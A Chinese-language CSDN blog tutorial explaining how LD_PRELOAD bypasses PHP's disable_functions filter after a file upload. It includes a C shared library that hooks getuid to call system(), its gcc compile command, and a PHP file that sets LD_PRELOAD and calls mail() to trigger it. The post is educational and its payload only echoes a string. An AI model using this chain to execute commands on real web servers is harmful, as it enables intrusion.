LD_PRELOAD绕过php命令执行过滤原理

最新推荐文章于 2024-07-23 13:03:02 发布
最新推荐文章于 2024-07-23 13:03:02 发布
阅读量661 收藏 9
点赞数 9
分类专栏: web安全 文章标签: linux php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lhy1963245411/article/details/140623105
版权

学习自0x03 LD_PRELOAD绕过原理介绍_哔哩哔哩_bilibili

首先是为什么需要LD_PRELOAD来进行绕过?

我们会遇到存在文件上传漏洞,但是把所有命令执行函数全部过滤的情况,这时候无论是什么命令执行函数都不行。那么有一种方法可以从源头上达到执行命令的方法,LD_PRELOAD就是其中一种。

什么是LD_PRELOAD?

LD_PRELOAD是一个在Linux/Unix系统中的环境变量,它允许程序在启动前预加载一个或多个共享库(通常是.so文件)到程序的地址空间中。

什么是库?

库,顾名思义就是用来存放东西的地方,在程序执行这块,就是用来存储程序将要用到的各种函数。这里主要指动态链接库,详细的内容请百度看看程序编译过程。

库里存放了程序执行可能要用到的各种函数。当程序执行时,遇到某个要执行的函数,就会从库中寻找对应的函数。这里有个危险的地方,就是程序寻找这个函数是通过名字,也就是说,我们将这个库中的某个函数内容修改为完全不同的内容,只要名字不变,程序就依旧会执行它。

如何利用LD_PRELOAD绕过

LD_PRELOAD的作用是让我们可以修改库。因此,我们可以自定义一个库,库中指定程序会用到的某个函数,并且精心设计,让这个函数最终可以达到攻击目的。

我们通常会利用mail函数来开始。mail函数执行时会调用getuid函数,此函数会查询当前用户是否为root或者普通用户,因此肯定是靠前执行的。因此我们对这个函数下手。

首先由于存在文件上传漏洞,所以我们要上传一个特殊的php文件,名为demo.php。初步设计文件内容如下:

<?php
mail("","","","");
?>

我们查看这个文件执行时会调用哪些函数,在linux下的命令如下:

strace -o 1.txt -f php demo.php    #将demo.php文件执行时调用的函数名称写入1.txt文件方便查询

然后我们查看1.txt

cat 1.txt

内容繁杂,于是进一步缩小范围,查看执行命令的部分

cat 1.txt | grep execve

由于这是php文件,所以第一个execve肯定是/usr/bin/php,而之后的两个则都是关于sendline的,我们继续查看关于/usr/sbin/sendmail的信息。

readelf -Ws /usr/sbin/sendmail

 

结果依旧繁杂,我们在其中不断寻找,最后找到getuid函数

 

 发现确实有这个getuid函数,因此理论上我们可以来编写假的getuid函数来顶替了。

开始编写脚本

#include<stdlib.h>
#include<stdio.h>
#include<string.h>
void payload(){
    system("echo 'what can i say'");
}
int getuid(){                    //编写自定义的getuid
    unsetenv("LD_PRELOAD");        //这里必须要有这步,否则会循环,详细可查询此函数
    payload();
}

 再将这个c文件编译成.so文件(动态链接库文件)。

gcc -shared -fPIC poc.c -o poc.so

 我们最后还需要在原先的demo.php文件中加入我们新修改而成的库文件的地址,以便于其调用

<?php
putenv("LD_PRELOAD=./poc.so");        //指定库文件路径
mail("","","","");
?>

 最后执行查看效果

php demo.php

 

至此,我们利用了LD_PRELOAD修改了共享库,从而在命令执行函数都被过滤的情况下最终执行了微危险函数。

feiwuw
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php mail ld preload,深入浅出LD_PRELOAD & putenv()
weixin_35240068的博客
03-25 254
前记上周利用空余时间,做了一下0ctf,感觉这道bypass disable function的题目比较有趣,于是分析一下,有了此文题目分析拿到题目Imagick is a awesome library for hackers to break `disable_functions`.So I installed php-imagick in the server, opened a `back...
无字母数字RCE与LD_PRELOAD绕disable_functions
D.MIND 的博客
04-19 1041
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
通过LD_PRELOAD绕过disable_functions
weixin_68047790的博客
08-20 648
由于我们通过 LD_PRELOAD 劫持了函数,劫持后启动了一个新进程,若不在新进程启动前取消 LD_PRELOAD,则将陷入无限循环,所以必须得删除环境变量 LD_PRELOAD,最直接的就是调用 unsetenv("LD_PRELOAD")
PHP绕过LD_PRELOAD bypass disable_functions
4ut15m's blog
03-03 1511
序 不能执行系统命令的webshell是没有灵魂的. LD_PRELOAD 众所周知,代码在编译成程序的时候有一个过程叫做链接-->将所引用的函数与变量链接到可执行程序中.编译过程中将所有的函数库链接完毕叫做静态链接,而动态链接则是编译过程中不进行链接操作,在程序运行时再动态的载入函数库.不管是静态链接还是动态链接,目的都很明确,载入函数库. LD_PRELOAD是与载入函数库相关的...
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
`LD_PRELOAD`是一个强大的Linux技巧,它允许我们修改或扩展动态链接器的行为。本篇文章将深入探讨`openredir`项目,它是如何利用`LD_PRELOAD`来重定向文件打开操作的。 首先,让我们理解`LD_PRELOAD`的概念。`LD_...
free_checker:使用LD_PRELOAD的简单内存泄漏查找程序(用于C程序)
05-06
**免费检查器(Free Checker)**是一个针对C语言程序的简单内存泄漏检测工具,它巧妙地利用了Linux动态链接器的特性——`LD_PRELOAD`。这个工具的主要目的是帮助程序员定位并解决C语言编程中常见的内存泄漏问题。...
PRELOAD:LD_PRELOAD rootkit实用程序
05-23
3. 示例程序:可能包含一些示例应用程序,用于演示`LD_PRELOAD`库的工作原理和效果。 4. 文档:可能有相关的使用说明、安全警告或技术细节的文档。 总的来说,理解`LD_PRELOAD`机制及其应用,对于开发者而言,是...
go-ldpreload-backdoor:使用Go进行LD_PRELOAD libc挂钩
02-05
使用Go LD_PRELOAD libc挂钩 这是在共享库中使用Go封装libc函数并启动TCP服务器(“后门”)的实验,该服务器允许从客户端(如telnet或netcat)运行任意命令。 这是一款用于教育目的的玩具,可演示Go的某些功能。 ...
srv-shim:通过LD_PRELOAD getaddrinfoconnect挂钩对旧系统的SRV记录支持
05-15
LD_PRELOAD=target/debug/libsrvshim.so \ curl _my-service._tcp.domain 您还可以在/etc/ld.so.conf创建一个条目,以使它被加载到系统上的所有进程中。 OSX: DYLD_INSERT_LIBRARIES=/abs/path/to/libsrvshim....
Linux小程序——进度条
最新发布
m0_66182473的博客
07-23 677
进度条
Linux:基础命令学习
qq_55038440的博客
07-20 912
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 893
Shell脚本的使用
【Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 1023
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
Linux 权限
includemainprinf的博客
07-18 691
在Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1168
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
Linux HOOK机制与Netfilter HOOK
Flashing-C的博客
07-18 787
在计算机中基本所有的软件程序都可以通过hook方式进行行为拦截,hook方式就是改变原始的执行流。 Linux常见的HOOK方式:1、修改函数指针。2、用户态动态库拦截。①利用环境变量LD_PRELOAD和预装载机制进行HOOK;②利用函数ptrace可实现对已运行的程序进行HOOK;3、内核态系统调用拦截。通过修改全局系统调用表,对系统调用进行劫持;4、堆栈式文件系统拦截。5、LSM。6、Netfilter HOOK。
Linux RV1126开发板 + AIR780E模块配置RNDIS网络
wxj280306451的博客
07-18 1042
此时,使用lsusb命令可以看到 AIR780E在开发板上枚举出来的PID和VID1d91 和 0001 就是VID和PID。
Linux——多路复用之select
kkbca的博客
07-19 1165
在前面,我们学习了五种IO模型,对IO有了基本的认识,知道了select效率很高,可以等待多个文件描述符,那他是如何等待的呢?我们又该如何使用呢?
LD_PRELOAD
07-27
LD_PRELOAD是一个环境变量,用于在程序运行时指定要预加载的共享库。它的工作原理是,当程序需要调用某个符号时,系统会先在程序自身的符号表中查找,如果找不到,则会在LD_PRELOAD指定的共享库中查找。如果在LD_PRELOAD指定的共享库中找到了该符号,则使用该符号中的代码。\[2\] 然而,有时候我们可能需要取消LD_PRELOAD的影响。一种常见的方法是在新进程启动前删除LD_PRELOAD环境变量,可以通过调用unsetenv("LD_PRELOAD")来实现。这样可以避免陷入无限循环的情况。\[1\] 另外,还有两种方法可以让LD_PRELOAD失效。一种是通过静态链接,使用gcc的-static参数可以将libc.so.6静态链接到执行程序中,但这也意味着程序不再支持动态链接。另一种方法是设置执行文件的setgid/setuid标志,对于具有SUID权限的执行文件,系统会忽略LD_PRELOAD环境变量。因此,如果你有以root方式运行的程序,最好设置上SUID权限。\[3\] #### 引用[.reference_title] - *1* [深入分析 LD_PRELOAD](https://blog.csdn.net/itworld123/article/details/125755603)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [LD_PRELOAD的使用](https://blog.csdn.net/Long_xu/article/details/128897509)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [linux LD_PRELOAD 预加载 so 简介](https://blog.csdn.net/whatday/article/details/108890018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值